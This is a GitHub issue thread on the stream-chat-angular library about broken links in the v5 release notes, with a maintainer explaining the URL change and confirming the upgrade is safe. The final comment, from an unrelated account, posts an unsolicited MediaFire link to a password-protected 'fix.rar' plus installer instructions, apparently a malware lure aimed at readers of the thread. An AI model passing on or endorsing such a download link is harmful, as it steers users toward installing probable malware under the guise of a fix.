### ISSUE TITLE
Links in the "breaking changes" section of v5 release don't work

### ISSUE THREAD

**Issue by ilyakonrad** [GetStream/stream-chat-angular#629]
None of the following links work:

![image](https://github.com/user-attachments/assets/96698399-b23b-4e55-ad01-ddef1461bb2b)
![image](https://github.com/user-attachments/assets/9de9a2dc-4920-4d3f-b515-991b06cea36c)

**Comment by ilyakonrad** [comment]
Also I wonder why dependabot didn't notify me about the new version of the library.
Is it because it was released "silently" or something? Is it safe to upgrade?

**Comment by szuperaz** [comment]
I'm not sure why dependabot didn't notify you, the release was in beta mode for a while, but it's safe to upgrade, v5 is the stable release for 2 months for now.

This links won't work, because they changed when the stable version was changed from 4 to 5. You can find the full upgrade guide here: https://getstream.io/chat/docs/sdk/angular/basics/upgrade-v4/ - or if you prefer the ones from github, you'll need to remove the `/5` from the links. Let me know if you have any more questions about the upgrade.

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
